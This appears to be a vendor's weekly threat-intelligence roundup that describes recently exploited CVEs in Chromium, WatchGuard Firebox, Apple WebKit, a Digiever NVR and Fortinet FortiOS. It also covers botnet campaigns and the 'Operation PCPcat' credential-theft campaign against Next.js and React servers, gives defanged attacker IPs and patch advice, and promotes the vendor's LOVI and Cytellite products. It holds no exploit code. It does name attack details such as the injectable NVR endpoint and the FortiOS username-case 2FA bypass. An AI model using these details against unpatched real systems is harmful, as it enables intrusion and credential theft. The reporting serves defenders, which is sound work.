From Firewalls to Frameworks: A Week of High-Impact Exploitation

This week’s observations reflected a continued surge in exploitation activity spanning legacy devices, perimeter security platforms, and modern web frameworks. Two vulnerabilities were added to the CISA KEV catalog, impacting WatchGuard Firebox appliances and an end-of-life Digiever DS-2105 Pro NVR, highlighting active abuse of both enterprise and IoT infrastructure. In parallel, renewed exploitation was observed against a five-year-old Fortinet flaw, reinforcing how older vulnerabilities remain valuable to attackers.  

Botnet operators including EnemyBot, Sysrv-K, Andoryu, and Androxgh0st intensified campaigns against exposed cloud services, routers, and web applications by abusing misconfigurations and unpatched systems.  

At the same time, the Beelzebub Research Team uncovered Operation PCPcat, a highly automated credential theft campaign exploiting Next.js and React2Shell vulnerabilities to compromise cloud-hosted applications at scale.

Key points:

• 2 vulnerabilities added to the CISA KEV catalog, reflecting recent exploitation activity.
• Renewed exploitation of a 5-year-old Fortinet flaw. ‍
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  ‍
• Operation PCPcat compromises over 60,000 servers in 48 hours ‍
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-14174 - Out of Bounds Memory Access Vulnerability in Google Chromium

An Out-of-Bounds Memory Access vulnerability in Google Chromium’s ANGLE graphics layer allowed remote attackers to trigger unauthorized memory access through a crafted HTML page, potentially impacting any Chromium-based browser such as Google Chrome, Microsoft Edge, and Opera. The flaw was initially tracked under Chromium issue ID 466192044, with details about the component and CVE assignment intentionally withheld. Evidence later confirmed that it was exploited as a zero-day in the wild, prompting urgent security responses. Google has issued patches in Chrome versions 143.0.7499.109/.110 for Windows and macOS and 143.0.7499.109 for Linux to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its active exploitation and the need for immediate remediation.

CVE-2025-14733 - Out of Bounds Write Vulnerability in WatchGuard Firebox

An Out-of-Bounds Write vulnerability in WatchGuard Fireware OS allowed unauthenticated remote attackers to achieve arbitrary code execution by targeting the iked process responsible for IKEv2 negotiations on Firebox appliances. The flaw impacted both Mobile User VPN and Branch Office VPN configurations using IKEv2 with dynamic gateway peers, exposing critical perimeter infrastructure. WatchGuard linked active exploitation to IPs 45.95.19[.]50, 51.15.17[.]89, 172.93.107[.]67, and 199.247.7[.]82, released Indicators of Attack for detection, and issued multiple patched versions. The issue has since been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring confirmed in-the-wild abuse.

CVE-2025-43529 - Use-After-Free WebKit Vulnerability in Apple Multiple Products

A Use-After-Free vulnerability in Apple's WebKit engine affected multiple products, including iOS, iPadOS, macOS Tahoe, tvOS, watchOS, visionOS, and Safari, and allowed remote code execution when processing maliciously crafted web content. Apple confirmed that the flaw discovered by Google’s Threat Analysis Group impacted any HTML parser relying on WebKit, extending risk beyond native Apple platforms to third-party products embedding WebKit. Although technical details were withheld, Apple acknowledged that CVE-2025-43529 and CVE-2025-14174 may have been exploited in an extremely sophisticated, targeted spyware campaign against individuals on versions of iOS prior to iOS 26. The vulnerability has been resolved in iOS/iPadOS 26.2, iOS/iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2. It was recently added to the CISA KEV catalog, following confirmation of in-the-wild exploitation.

CVE-2023-52163 - Missing Authorization Vulnerability in Digiever DS-2105 Pro

A Missing Authorization vulnerability in the DigiEver DS-2105 Pro NVR allowed attackers to perform command injection via the time_tzsetup.cgi endpoint, leading to remote code execution. The device, widely used in surveillance environments for managing IP camera feeds, had reached end-of-life and was no longer supported by the vendor, leaving no official patch available. Although exploitation required an authenticated session, attackers were observed abusing weak controls to deploy malware and compromise exposed systems. The flaw has since been added to the CISA KEV catalog, prompting guidance to avoid internet exposure and rotate default credentials immediately.

CVE-2020-12812 - Improper Authentication Vulnerability in Fortinet FortiOS

An Improper Authentication vulnerability in Fortinet FortiOS SSL VPN allowed users to bypass two-factor authentication by simply changing the case of their username when local users with 2FA were mapped to remote authentication backends such as LDAP. The flaw stemmed from inconsistent case-sensitive matching between local and remote authentication checks and was discovered and patched by Fortinet initially in July 2020. The vulnerability later came under active exploitation in the wild by multiple threat actors and was listed by the U.S. government among weaknesses abused in attacks on perimeter devices in 2021. In a December 24, 2025 advisory, Fortinet reiterated the affected configurations and urged customers to review logs, contact support, and reset credentials if evidence of VPN or admin access without 2FA was observed.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

Emergence of Operation PCPcat

Beelzebub Research Team reported the discovery of "Operation PCPcat", a highly automated and efficient credential theft campaign, that weaponized vulnerabilities in the Next.js and React frameworks to compromise cloud-hosted web applications at scale. Identified through a Docker honeypot, the operation exploited CVE-2025-29927 and CVE-2025-55182 to breach 59,128 servers in less than 48 hours, demonstrating an unusually high success rate compared to typical mass-scanning campaigns. The activity reflected precision targeting rather than opportunistic “spray and pray” attacks, underscoring the campaign’s operational maturity and impact. Organizations operating public-facing Next.js or React services were urged to apply patches immediately, block the command-and-control address 67.217.57(.)240, and rotate any credentials exposed through environment files to contain potential compromise.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

Collectively, these developments show how attackers continued to blend exploitation of legacy systems with rapid weaponization of modern application flaws to maximize impact. The shrinking gap between disclosure and abuse reinforced the need for continuous visibility and faster response across environments. Loginsoft Vulnerability Intelligence (LOVI) enables teams to track emerging exploitation trends, prioritize high-risk exposures, and act before threats escalate. With real-time intelligence and actionable insights, LOVI helps organizations stay resilient against both old and new attack paths.

FAQs:

1) What is React2Shell and why is it appealing for threat actors?

A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.

2) How does LOVI help organizations manage vulnerabilities effectively?

A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

3) What is WatchGuard Firebox?

A) WatchGuard Firebox is a next-generation firewall appliance that delivers unified threat management, VPN, intrusion prevention, and network security for enterprise and branch environments. It is powered by WatchGuard Fireware OS and is widely used to secure perimeter and remote access infrastructure.

4) What is Cytellite?

A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.